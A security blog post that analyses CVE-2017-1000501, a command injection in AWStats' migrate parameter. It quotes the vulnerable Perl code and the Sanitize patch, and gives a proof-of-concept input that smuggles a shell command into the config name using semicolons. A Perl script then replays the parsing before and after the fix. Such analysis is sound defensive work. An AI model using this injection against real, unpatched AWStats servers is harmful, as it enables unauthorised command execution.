prsecurity.org

building an AWStats CVE-2017-1000501 PoC

This is a quick and dirty analysis of an old command injection bug in a Perl script.

The AWStats ChangeLog mentions a fix for CVE-2017-1000501, shipped in version 7.7.

Let's look at the patch:

They changed

$SiteConfig = $5 ? $5 : 'xxx';

into

$SiteConfig = &Sanitize($5 ? $5 : 'xxx');

The Sanitize function is defined as:

sub Sanitize {
    my $stringtoclean = shift;
    my $full = shift || 0;    # second argument selects the strict mode
    if ($full) {
        # strict mode: keep only word characters (letters, digits, underscore)
        $stringtoclean =~ s/[^\w\d]//g;
    }
    else {
        # default mode (the one used for $SiteConfig): additionally keep - \ / . : and whitespace
        $stringtoclean =~ s/[^\w\d\-\\\/\.:\s]//g;
    }
    return $stringtoclean;
}

Since the migrate code calls it without the second argument, the default branch applies: only word characters (letters, digits, _), '-', '\', '/', '.', ':' and whitespace survive; everything else, including the ';' a shell would use as a command separator, is deleted. Prior to the patch the user input passed through untouched, apart from a leading dot being stripped. The relevant code is this:

if ( $ARGV[$_] =~ /(^|-|&|&amp;)migrate=([^&]+)/i ) {    # migrate= from CLI flag or query string (plain or HTML-encoded '&')
    $MigrateStats = "$2";
    # history file name: $PROG ("awstats"), 6 to 8 date digits, then $5 up to a trailing ".txt"
    $MigrateStats =~ /^(.*)$PROG(\d{0,2})(\d\d)(\d\d\d\d)(.*)\.txt$/;
    $SiteConfig = $5 ? $5 : 'xxx';    # $5 is attacker-controlled and unfiltered before the patch
    $SiteConfig =~ s/^\.//;    # SiteConfig is used to find config file
    print $SiteConfig;    # debug print, handy when testing the PoC from the CLI
    next;
}

To reach this code you would normally send a GET request with a crafted migrate parameter, but for a PoC the CLI is enough, since the same argument parsing handles both. The value has to satisfy the $MigrateStats pattern: the literal $PROG ('awstats'), six to eight digits for the three date groups, then whatever we want captured in $5, then a trailing .txt. So

migrate=awstats12345678./x;echo pwned;.txt

puts './x;echo pwned;' into $5; the leading dot is stripped and $SiteConfig becomes '/x;echo pwned;'. As a PoC from the CLI (the argument must be quoted, otherwise your own shell splits the command at the semicolons, runs 'echo pwned' itself and awstats.pl never sees the full string):

perl awstats.pl '-migrate=awstats00000000./x;echo pwned;.txt'

After the 7.7 patch, Sanitize removes the semicolons and the same input only yields '/xecho pwned'.
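To see the capture and the effect of Sanitize without a running AWStats install, here is an added example script (my code, not AWStats' own) that replays the migrate= branch against a few constructed inputs, once with the pre-7.7 assignment and once through Sanitize. It assumes $PROG is 'awstats' (awstats.pl derives it from its own file name) and that real history files are named awstatsMMYYYY.<config>.txt; the helper name site_config_from_arg is mine.

```perl
#!/usr/bin/perl
# Added example, not AWStats code: replays the migrate= handling from
# awstats.pl against constructed inputs, once with the pre-7.7 assignment
# and once through Sanitize(), to show what the patch does to the payload.
use strict;
use warnings;

# awstats.pl derives $PROG from its own file name; hard-coded here (assumption).
my $PROG = 'awstats';

# Sanitize() as shipped in the patched awstats.pl (quoted from the post).
sub Sanitize {
    my $stringtoclean = shift;
    my $full          = shift || 0;
    if ($full) {
        $stringtoclean =~ s/[^\w\d]//g;
    }
    else {
        $stringtoclean =~ s/[^\w\d\-\\\/\.:\s]//g;
    }
    return $stringtoclean;
}

# Mirrors the migrate= branch. $patched selects the post-patch assignment.
# Returns the resulting $SiteConfig, or undef if $arg carries no migrate=.
sub site_config_from_arg {
    my ( $arg, $patched ) = @_;
    return undef unless $arg =~ /(^|-|&|&amp;)migrate=([^&]+)/i;
    my $MigrateStats = "$2";

    # Same capture pattern as awstats.pl: $PROG, 6-8 date digits, then
    # anything ($5) up to a trailing ".txt". If it fails, $5 is undef
    # (the earlier match in this function has only two groups) and 'xxx' is used.
    $MigrateStats =~ /^(.*)$PROG(\d{0,2})(\d\d)(\d\d\d\d)(.*)\.txt$/;
    my $raw        = $5 ? $5 : 'xxx';
    my $SiteConfig = $patched ? Sanitize($raw) : $raw;
    $SiteConfig =~ s/^\.//;    # the dot separates the date digits from the config name
    return $SiteConfig;
}

# Constructed inputs: a normal history file name (awstatsMMYYYY.<config>.txt,
# assumption), a value that does not match the pattern, and the PoC payload.
my @inputs = (
    '-migrate=awstats122017.example.com.txt',
    '-migrate=not-a-history-file',
    '-migrate=awstats00000000./x;echo pwned;.txt',
);

for my $arg (@inputs) {
    printf "%-48s unpatched: %-18s patched: %s\n",
        $arg, site_config_from_arg( $arg, 0 ), site_config_from_arg( $arg, 1 );
}

# On the PoC payload the semicolons survive unpatched and are stripped by
# Sanitize(), which is what breaks the injection.
die "unexpected unpatched value"
    unless site_config_from_arg( $inputs[2], 0 ) eq '/x;echo pwned;';
die "unexpected patched value"
    unless site_config_from_arg( $inputs[2], 1 ) eq '/xecho pwned';
```

Run it with plain perl; the benign name resolves to 'example.com' in both modes, the non-matching value falls back to 'xxx', and the payload shows the two ';' characters disappearing after the patch while '/', '.' and the space are kept. Note that in this whole-argument form, unlike the one-liner above, there is nothing for your shell to split, so the result really comes from the script.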